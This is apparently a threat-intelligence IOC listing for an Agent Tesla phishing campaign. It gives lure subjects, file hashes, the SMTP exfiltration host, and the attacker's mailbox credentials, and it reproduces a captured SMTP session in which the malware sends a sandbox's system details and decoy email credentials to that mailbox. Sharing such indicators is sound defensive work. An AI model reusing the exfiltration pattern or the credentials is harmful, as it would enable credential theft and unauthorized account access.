-
Notifications
You must be signed in to change notification settings - Fork 84
/
2021-09-07 Agent Tesla IOCs
80 lines (66 loc) · 2.08 KB
/
2021-09-07 Agent Tesla IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
THREAT ATTRIBUTION: AGENT TESLA
SUBJECTS OBSERVED
Re-Tendered to Sealed Bid DNO-RFQ-NO-10516 The Provision of Supplying the Export Pump Spares for PSK
SENDERS OBSERVED
MALDOC FILE HASHES
RFQ clarification Templates.img
d75fa462f0ccf7e7071f74bc0c208b2d
Ref-10516.img
f761a67063eddc22d75e0baec49598c9
AGENT TESLA PAYLOAD FILE HASHES
Both .img files contain the same .exe file hash
Ref-10516.exe
6610ae61cddc82e42c5fb75b7eb997e0
RFQ clarification Templates.exe
6610ae61cddc82e42c5fb75b7eb997e0
EXFILTRATION INFORMATION - SMTP
smtp.almuntakhaba.com:587
208.91.199.224:587
SMTP CREDENTIALS:
Username: [email protected]
Password: amite123
Username and password were base64 encoded
EXFILTRATION PACKET DATA
220 us2.outbound.mailhostbox.com ESMTP Postfix
EHLO WIN7PC
250-us2.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
AUTH login cHBjQGFsbXVudGFraGFiYS5jb20=
334 UGFzc3dvcmQ6
YW1pdGUxMjM=
235 2.7.0 Authentication successful
MAIL FROM:<[email protected]>
250 2.1.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
MIME-Version: 1.0
From: [email protected]
Date: 7 Sep 2021 12:15:40 -0400
Subject: PW_analyst/WIN7PC
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
Time: 09/07/2021 12:15:38<br>User Name: analyst<br>Computer Name:=
WIN7PC<br>OSFullName: Microsoft Windows 7 Home Premium <br>CPU: =
Intel(R) Xeon(R) W-2255 CPU @ 3.70GHz<br>RAM: 2047.55 MB<br>IP Ad=
dress: <br><hr>URL:imap://imap.gmail.com<br>=0D=0AUsername:decoye=
[email protected]<br>=0D=0APassword:givememalware<br>=0D=0AApp=
lication:Thunderbird<br>=0D=0A<hr>=0D=0AURL:smtp://smtp.gmail.com=
<br>=0D=0AUsername:[email protected]<br>=0D=0APassword:givem=
emalware<br>=0D=0AApplication:Thunderbird<br>=0D=0A<hr>=0D=0A
.
250 2.0.0 Ok: queued as 880121C4C38
SUPPORTING EVIDENCE
https://www.virustotal.com/gui/file/22b6dd0b8283ef325f655239163773943eb00cd3c2425dfd9fc6876812fcaf20/community